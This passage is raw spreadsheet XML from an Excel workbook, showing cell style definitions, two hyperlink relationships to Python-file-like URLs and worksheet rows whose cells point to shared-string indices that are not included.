    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="37" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="38" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="40" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="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followtheleader.py/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://xxx.py/"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O1005"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection sqref="A1:B1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="14.5" defaultRowHeight="15.75" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="42.5" customWidth="1"/>
    <col min="2" max="2" width="25" customWidth="1"/>
    <col min="3" max="3" width="39.83203125" customWidth="1"/>
    <col min="5" max="5" width="38" customWidth="1"/>
    <col min="7" max="7" width="38.83203125" customWidth="1"/>
    <col min="9" max="9" width="36.5" customWidth="1"/>
    <col min="10" max="10" width="24.6640625" customWidth="1"/>
    <col min="11" max="11" width="38.1640625" customWidth="1"/>
    <col min="12" max="12" width="19.1640625" customWidth="1"/>
    <col min="13" max="13" width="29.1640625" customWidth="1"/>
    <col min="15" max="15" width="32.6640625" customWidth="1"/>
    <col min="16" max="16" width="22.5" customWidth="1"/>
    <col min="17" max="17" width="31.6640625" customWidth="1"/>
    <col min="19" max="19" width="29.5" customWidth="1"/>
    <col min="21" max="21" width="33.33203125" customWidth="1"/>
    <col min="22" max="22" width="19.5" customWidth="1"/>
    <col min="23" max="23" width="27.33203125" customWidth="1"/>
    <col min="25" max="25" width="33.1640625" customWidth="1"/>
    <col min="27" max="27" width="37.83203125" customWidth="1"/>
    <col min="28" max="28" width="28.6640625" customWidth="1"/>
    <col min="29" max="29" width="32" customWidth="1"/>
    <col min="30" max="30" width="19.83203125" customWidth="1"/>
    <col min="31" max="31" width="46.6640625" customWidth="1"/>
    <col min="32" max="32" width="28.5" customWidth="1"/>
    <col min="33" max="33" width="43.5" customWidth="1"/>
    <col min="34" max="34" width="19" customWidth="1"/>
    <col min="35" max="35" width="36.33203125" customWidth="1"/>
    <col min="36" max="36" width="25.5" customWidth="1"/>
    <col min="37" max="37" width="35.1640625" customWidth="1"/>
    <col min="38" max="38" width="19.6640625" customWidth="1"/>
    <col min="39" max="39" width="43" customWidth="1"/>
    <col min="40" max="40" width="31.6640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:41" ht="37.5" customHeight="1">
      <c r="A1" s="23" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="20"/>
      <c r="C1" s="23" t="s">
        <v>1</v>
      </c>
      <c r="D1" s="20"/>
      <c r="E1" s="23" t="s">
        <v>2</v>
      </c>
      <c r="F1" s="20"/>
      <c r="G1" s="23" t="s">
        <v>3</v>
      </c>
      <c r="H1" s="20"/>
      <c r="I1" s="23" t="s">
        <v>4</v>
      </c>
      <c r="J1" s="20"/>
      <c r="K1" s="23" t="s">
        <v>5</v>
      </c>
      <c r="L1" s="20"/>
      <c r="M1" s="23" t="s">
        <v>6</v>
      </c>
      <c r="N1" s="20"/>
      <c r="O1" s="23" t="s">
        <v>7</v>
      </c>
      <c r="P1" s="20"/>
      <c r="Q1" s="23" t="s">
        <v>8</v>
      </c>
      <c r="R1" s="20"/>
      <c r="S1" s="23" t="s">
        <v>9</v>
      </c>
      <c r="T1" s="20"/>
      <c r="U1" s="23" t="s">
        <v>10</v>
      </c>
      <c r="V1" s="20"/>
      <c r="W1" s="23" t="s">
        <v>11</v>
      </c>
      <c r="X1" s="20"/>
      <c r="Y1" s="23" t="s">
        <v>12</v>
      </c>
      <c r="Z1" s="20"/>
      <c r="AA1" s="23" t="s">
        <v>13</v>
      </c>
      <c r="AB1" s="20"/>
      <c r="AC1" s="23" t="s">
        <v>14</v>
      </c>
      <c r="AD1" s="20"/>
      <c r="AE1" s="23" t="s">
        <v>15</v>
      </c>
      <c r="AF1" s="20"/>
      <c r="AG1" s="23" t="s">
        <v>16</v>
      </c>
      <c r="AH1" s="20"/>
      <c r="AI1" s="23" t="s">
        <v>17</v>
      </c>
      <c r="AJ1" s="20"/>
      <c r="AK1" s="23" t="s">
        <v>18</v>
      </c>
      <c r="AL1" s="20"/>
      <c r="AM1" s="23" t="s">
        <v>19</v>
      </c>
      <c r="AN1" s="20"/>
      <c r="AO1" s="2"/>
    </row>
    <row r="2" spans="1:41" ht="37.5" customHeight="1">
      <c r="A2" s="3" t="s">
        <v>20</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>21</v>
      </c>
      <c r="C2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="D2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="F2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="G2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="H2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="I2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="J2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="K2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="L2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="M2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="N2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="O2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="P2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="Q2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="R2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="S2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="T2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="U2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="V2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="W2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="X2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="Y2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="Z2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AA2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AB2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AC2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AD2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AE2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AF2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AG2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AH2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AI2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AJ2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AK2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AL2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AM2" s="4" t="s">
        <v>20</v>
      </c>
      <c r="AN2" s="4" t="s">
        <v>21</v>
      </c>
      <c r="AO2" s="4"/>
    </row>
    <row r="3" spans="1:41" ht="37.5" customHeight="1">
      <c r="A3" s="5" t="s">
        <v>22</v>
      </c>
      <c r="B3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>22</v>
      </c>
      <c r="D3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="E3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="F3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="G3" s="7" t="s">
        <v>23</v>
      </c>
      <c r="H3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="I3" s="7" t="s">
        <v>23</v>
      </c>
      <c r="J3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="K3" s="7" t="s">
        <v>23</v>
      </c>
      <c r="L3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="M3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="N3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="O3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="P3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="Q3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="R3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="S3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="T3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="U3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="V3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="W3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="X3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="Y3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="Z3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AA3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="AB3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AC3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="AD3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AE3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="AF3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AG3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="AH3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AI3" s="7" t="s">
        <v>24</v>
      </c>
      <c r="AJ3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AK3" s="7" t="s">
        <v>22</v>
      </c>
      <c r="AL3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AM3" s="7" t="s">
        <v>24</v>
      </c>
      <c r="AN3" s="6" t="s">
        <v>22</v>
      </c>
      <c r="AO3" s="8"/>
    </row>
    <row r="4" spans="1:41" ht="37.5" customHeight="1">
      <c r="A4" s="5" t="s">
        <v>25</v>
      </c>
      <c r="B4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="C4" s="5" t="s">
        <v>25</v>
      </c>
      <c r="D4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="E4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="G4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="H4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="I4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="J4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="K4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="L4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="M4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="N4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="O4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="P4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="Q4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="R4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="S4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="T4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="U4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="V4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="W4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="X4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="Y4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="Z4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AA4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AB4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AC4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AD4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AE4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AF4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AG4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AH4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AI4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AJ4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AK4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AL4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AM4" s="7" t="s">
        <v>25</v>
      </c>
      <c r="AN4" s="6" t="s">
        <v>26</v>
      </c>
      <c r="AO4" s="8"/>
    </row>
    <row r="5" spans="1:41" ht="37.5" customHeight="1">
      <c r="A5" s="5" t="s">
        <v>27</v>
      </c>
      <c r="B5" s="21" t="s">
        <v>28</v>
      </c>
      <c r="C5" s="5" t="s">
        <v>27</v>
      </c>
      <c r="D5" s="21" t="s">
        <v>29</v>
      </c>
      <c r="E5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="F5" s="21" t="s">
        <v>28</v>
      </c>
      <c r="G5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="H5" s="21" t="s">
        <v>29</v>
      </c>
      <c r="I5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="J5" s="21" t="s">
        <v>30</v>
      </c>
      <c r="K5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="L5" s="21" t="s">
        <v>30</v>
      </c>
      <c r="M5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="N5" s="21" t="s">
        <v>31</v>
      </c>
      <c r="O5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="P5" s="21" t="s">
        <v>32</v>
      </c>
      <c r="Q5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="R5" s="21" t="s">
        <v>33</v>
      </c>
      <c r="S5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="T5" s="21" t="s">
        <v>34</v>
      </c>
      <c r="U5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="V5" s="21" t="s">
        <v>35</v>
      </c>
      <c r="W5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="X5" s="21" t="s">
        <v>36</v>
      </c>
      <c r="Y5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="Z5" s="6" t="s">
        <v>37</v>
      </c>
      <c r="AA5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AB5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AC5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AD5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AE5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AF5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AG5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AH5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AI5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AJ5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AK5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AL5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AM5" s="7" t="s">
        <v>27</v>
      </c>
      <c r="AN5" s="6" t="s">
        <v>38</v>
      </c>
      <c r="AO5" s="8"/>
    </row>
    <row r="6" spans="1:41" ht="37.5" customHeight="1">
      <c r="A6" s="5" t="s">
        <v>39</v>
      </c>
      <c r="B6" s="20"/>
      <c r="C6" s="7" t="s">
        <v>40</v>
      </c>
      <c r="D6" s="20"/>
      <c r="E6" s="7" t="s">
        <v>39</v>
      </c>
      <c r="F6" s="20"/>
      <c r="G6" s="7" t="s">
        <v>41</v>
      </c>
      <c r="H6" s="20"/>
      <c r="I6" s="7" t="s">
        <v>42</v>
      </c>
      <c r="J6" s="20"/>
      <c r="K6" s="7" t="s">
        <v>43</v>
      </c>
      <c r="L6" s="20"/>
      <c r="M6" s="7" t="s">
        <v>44</v>
      </c>
      <c r="N6" s="20"/>
      <c r="O6" s="7" t="s">
        <v>40</v>
      </c>
      <c r="P6" s="20"/>
      <c r="Q6" s="7" t="s">
        <v>39</v>
      </c>
      <c r="R6" s="20"/>
      <c r="S6" s="7" t="s">
        <v>45</v>
      </c>
      <c r="T6" s="20"/>
      <c r="U6" s="7" t="s">
        <v>43</v>
      </c>
      <c r="V6" s="20"/>
      <c r="W6" s="7" t="s">
        <v>39</v>
      </c>
      <c r="X6" s="20"/>
      <c r="Y6" s="7" t="s">
        <v>46</v>
      </c>
      <c r="Z6" s="21" t="s">
        <v>47</v>
      </c>
      <c r="AA6" s="7" t="s">
        <v>48</v>
      </c>
      <c r="AB6" s="9" t="s">
        <v>49</v>
      </c>
      <c r="AC6" s="7" t="s">
        <v>39</v>
      </c>
      <c r="AD6" s="9" t="s">
        <v>50</v>
      </c>
      <c r="AE6" s="7" t="s">
        <v>39</v>
      </c>
      <c r="AF6" s="6" t="s">
        <v>51</v>
      </c>
      <c r="AG6" s="7" t="s">
        <v>40</v>
      </c>
      <c r="AH6" s="6" t="s">
        <v>52</v>
      </c>
      <c r="AI6" s="7" t="s">
        <v>53</v>
      </c>
      <c r="AJ6" s="6" t="s">
        <v>54</v>
      </c>
      <c r="AK6" s="7" t="s">
        <v>40</v>
      </c>
      <c r="AL6" s="6" t="s">
        <v>52</v>
      </c>
      <c r="AM6" s="7" t="s">
        <v>39</v>
      </c>
      <c r="AN6" s="6" t="s">
        <v>51</v>
      </c>
      <c r="AO6" s="8"/>
    </row>
    <row r="7" spans="1:41" ht="37.5" customHeight="1">
      <c r="A7" s="5"/>
      <c r="B7" s="8"/>
      <c r="C7" s="5"/>
      <c r="D7" s="10"/>
      <c r="E7" s="11"/>
      <c r="F7" s="8"/>
      <c r="G7" s="11"/>
      <c r="H7" s="8"/>
      <c r="I7" s="11"/>
      <c r="J7" s="8"/>
      <c r="K7" s="11"/>
      <c r="L7" s="8"/>
      <c r="M7" s="11"/>
      <c r="N7" s="8"/>
      <c r="O7" s="11"/>
      <c r="P7" s="8"/>
      <c r="Q7" s="11"/>
      <c r="R7" s="8"/>
      <c r="S7" s="11"/>
      <c r="T7" s="8"/>
      <c r="U7" s="11"/>
      <c r="V7" s="8"/>
      <c r="W7" s="11"/>
      <c r="X7" s="8"/>
      <c r="Y7" s="7" t="s">
        <v>55</v>
      </c>
      <c r="Z7" s="20"/>
      <c r="AA7" s="11"/>
      <c r="AB7" s="8"/>
      <c r="AC7" s="11"/>
      <c r="AD7" s="8"/>
      <c r="AE7" s="11"/>
      <c r="AF7" s="8"/>
      <c r="AG7" s="11"/>
      <c r="AH7" s="8"/>
      <c r="AI7" s="11"/>
      <c r="AJ7" s="8"/>
      <c r="AK7" s="11"/>
      <c r="AL7" s="8"/>
      <c r="AM7" s="11"/>
      <c r="AN7" s="8"/>
      <c r="AO7" s="8"/>
    </row>
    <row r="8" spans="1:41" ht="37.5" customHeight="1">
      <c r="A8" s="5" t="s">
        <v>56</v>
      </c>
      <c r="B8" s="21" t="s">
        <v>57</v>
      </c>
      <c r="C8" s="5" t="s">
        <v>56</v>
      </c>
      <c r="D8" s="6" t="s">
        <v>58</v>
      </c>
      <c r="E8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="F8" s="21" t="s">
        <v>57</v>
      </c>
      <c r="G8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="H8" s="21" t="s">
        <v>57</v>
      </c>
      <c r="I8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="J8" s="21" t="s">
        <v>57</v>
      </c>
      <c r="K8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="L8" s="21" t="s">
        <v>57</v>
      </c>
      <c r="M8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="N8" s="6" t="s">
        <v>59</v>
      </c>
      <c r="O8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="P8" s="1" t="s">
        <v>60</v>
      </c>
      <c r="Q8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="R8" s="6" t="s">
        <v>61</v>
      </c>
      <c r="S8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="T8" s="6" t="s">
        <v>62</v>
      </c>
      <c r="U8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="V8" s="21" t="s">
        <v>63</v>
      </c>
      <c r="W8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="X8" s="21" t="s">
        <v>64</v>
      </c>
      <c r="Y8" s="7" t="s">
        <v>65</v>
      </c>
      <c r="Z8" s="20"/>
      <c r="AA8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="AB8" s="6" t="s">
        <v>66</v>
      </c>
      <c r="AC8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="AD8" s="6" t="s">
        <v>60</v>
      </c>
      <c r="AE8" s="7" t="s">
        <v>67</v>
      </c>
      <c r="AF8" s="6" t="s">
        <v>68</v>
      </c>
      <c r="AG8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="AH8" s="21" t="s">
        <v>57</v>
      </c>
      <c r="AI8" s="7" t="s">
        <v>69</v>
      </c>
      <c r="AJ8" s="6" t="s">
        <v>70</v>
      </c>
      <c r="AK8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="AL8" s="6" t="s">
        <v>71</v>
      </c>
      <c r="AM8" s="7" t="s">
        <v>56</v>
      </c>
      <c r="AN8" s="6" t="s">
        <v>59</v>
      </c>
      <c r="AO8" s="8"/>
    </row>
    <row r="9" spans="1:41" ht="37.5" customHeight="1">
      <c r="A9" s="5" t="s">
        <v>72</v>
      </c>
      <c r="B9" s="20"/>
      <c r="C9" s="5" t="s">
        <v>73</v>
      </c>
      <c r="D9" s="6" t="s">
        <v>74</v>
      </c>
      <c r="E9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="F9" s="20"/>
      <c r="G9" s="7" t="s">
        <v>75</v>
      </c>
      <c r="H9" s="20"/>
      <c r="I9" s="7" t="s">
        <v>75</v>
      </c>
      <c r="J9" s="20"/>
      <c r="K9" s="7" t="s">
        <v>75</v>
      </c>
      <c r="L9" s="20"/>
      <c r="M9" s="7" t="s">
        <v>76</v>
      </c>
      <c r="N9" s="21" t="s">
        <v>77</v>
      </c>
      <c r="O9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="P9" s="6" t="s">
        <v>78</v>
      </c>
      <c r="Q9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="R9" s="6" t="s">
        <v>79</v>
      </c>
      <c r="S9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="T9" s="6" t="s">
        <v>80</v>
      </c>
      <c r="U9" s="7" t="s">
        <v>75</v>
      </c>
      <c r="V9" s="20"/>
      <c r="W9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="X9" s="20"/>
      <c r="Y9" s="7" t="s">
        <v>81</v>
      </c>
      <c r="Z9" s="20"/>
      <c r="AA9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="AB9" s="6" t="s">
        <v>82</v>
      </c>
      <c r="AC9" s="7" t="s">
        <v>83</v>
      </c>
      <c r="AD9" s="21" t="s">
        <v>84</v>
      </c>
      <c r="AE9" s="12" t="s">
        <v>72</v>
      </c>
      <c r="AF9" s="13" t="s">
        <v>85</v>
      </c>
      <c r="AG9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="AH9" s="20"/>
      <c r="AI9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="AJ9" s="6" t="s">
        <v>86</v>
      </c>
      <c r="AK9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="AL9" s="6" t="s">
        <v>87</v>
      </c>
      <c r="AM9" s="7" t="s">
        <v>72</v>
      </c>
      <c r="AN9" s="6" t="s">
        <v>88</v>
      </c>
      <c r="AO9" s="8"/>
    </row>
    <row r="10" spans="1:41" ht="37.5" customHeight="1">
      <c r="A10" s="5" t="s">
        <v>76</v>
      </c>
      <c r="B10" s="24" t="s">
        <v>89</v>
      </c>
      <c r="C10" s="5" t="s">
        <v>83</v>
      </c>
      <c r="D10" s="21" t="s">
        <v>90</v>
      </c>
      <c r="E10" s="7" t="s">
        <v>91</v>
      </c>
      <c r="F10" s="6" t="s">
        <v>92</v>
      </c>
      <c r="G10" s="7" t="s">
        <v>93</v>
      </c>
      <c r="H10" s="6" t="s">
        <v>94</v>
      </c>
      <c r="I10" s="7" t="s">
        <v>95</v>
      </c>
      <c r="J10" s="21" t="s">
        <v>96</v>
      </c>
      <c r="K10" s="7" t="s">
        <v>95</v>
      </c>
      <c r="L10" s="21" t="s">
        <v>96</v>
      </c>
      <c r="M10" s="7" t="s">
        <v>97</v>
      </c>
      <c r="N10" s="20"/>
      <c r="O10" s="7" t="s">
        <v>98</v>
      </c>
      <c r="P10" s="6" t="s">
        <v>99</v>
      </c>
      <c r="Q10" s="7" t="s">
        <v>76</v>
      </c>
      <c r="R10" s="21" t="s">
        <v>100</v>
      </c>
      <c r="S10" s="7" t="s">
        <v>101</v>
      </c>
      <c r="T10" s="6" t="s">
        <v>102</v>
      </c>
      <c r="U10" s="7" t="s">
        <v>95</v>
      </c>
      <c r="V10" s="21" t="s">
        <v>103</v>
      </c>
      <c r="W10" s="7" t="s">
        <v>104</v>
      </c>
      <c r="X10" s="20"/>
      <c r="Y10" s="7" t="s">
        <v>105</v>
      </c>
      <c r="Z10" s="6" t="s">
        <v>106</v>
      </c>
      <c r="AA10" s="7" t="s">
        <v>97</v>
      </c>
      <c r="AB10" s="6" t="s">
        <v>107</v>
      </c>
      <c r="AC10" s="7" t="s">
        <v>108</v>
      </c>
      <c r="AD10" s="20"/>
      <c r="AE10" s="11"/>
      <c r="AF10" s="8"/>
      <c r="AG10" s="7" t="s">
        <v>76</v>
      </c>
      <c r="AH10" s="21" t="s">
        <v>109</v>
      </c>
      <c r="AI10" s="7" t="s">
        <v>83</v>
      </c>
      <c r="AJ10" s="21" t="s">
        <v>110</v>
      </c>
      <c r="AK10" s="7" t="s">
        <v>111</v>
      </c>
      <c r="AL10" s="21" t="s">
        <v>112</v>
      </c>
      <c r="AM10" s="7" t="s">
        <v>73</v>
      </c>
      <c r="AN10" s="6" t="s">
        <v>113</v>
      </c>
      <c r="AO10" s="8"/>
    </row>
    <row r="11" spans="1:41" ht="37.5" customHeight="1">
      <c r="A11" s="5" t="s">
        <v>114</v>
      </c>
      <c r="B11" s="20"/>
      <c r="C11" s="5" t="s">
        <v>108</v>
      </c>
      <c r="D11" s="20"/>
      <c r="E11" s="7" t="s">
        <v>76</v>
      </c>
      <c r="F11" s="21" t="s">
        <v>115</v>
      </c>
      <c r="G11" s="7" t="s">
        <v>116</v>
      </c>
      <c r="H11" s="21" t="s">
        <v>117</v>
      </c>
      <c r="I11" s="7" t="s">
        <v>118</v>
      </c>
      <c r="J11" s="20"/>
      <c r="K11" s="7" t="s">
        <v>118</v>
      </c>
      <c r="L11" s="20"/>
      <c r="M11" s="7" t="s">
        <v>72</v>
      </c>
      <c r="N11" s="21" t="s">
        <v>119</v>
      </c>
      <c r="O11" s="7" t="s">
        <v>104</v>
      </c>
      <c r="P11" s="6" t="s">
        <v>120</v>
      </c>
      <c r="Q11" s="7" t="s">
        <v>121</v>
      </c>
      <c r="R11" s="20"/>
      <c r="S11" s="7" t="s">
        <v>76</v>
      </c>
      <c r="T11" s="6" t="s">
        <v>122</v>
      </c>
      <c r="U11" s="7" t="s">
        <v>123</v>
      </c>
      <c r="V11" s="20"/>
      <c r="W11" s="11"/>
      <c r="X11" s="8"/>
      <c r="Y11" s="7" t="s">
        <v>124</v>
      </c>
      <c r="Z11" s="6" t="s">
        <v>52</v>
      </c>
      <c r="AA11" s="7" t="s">
        <v>125</v>
      </c>
      <c r="AB11" s="6" t="s">
        <v>126</v>
      </c>
      <c r="AC11" s="7" t="s">
        <v>76</v>
      </c>
      <c r="AD11" s="20"/>
      <c r="AE11" s="7" t="s">
        <v>127</v>
      </c>
      <c r="AF11" s="6" t="s">
        <v>128</v>
      </c>
      <c r="AG11" s="7" t="s">
        <v>129</v>
      </c>
      <c r="AH11" s="20"/>
      <c r="AI11" s="7" t="s">
        <v>130</v>
      </c>
      <c r="AJ11" s="20"/>
      <c r="AK11" s="7" t="s">
        <v>83</v>
      </c>
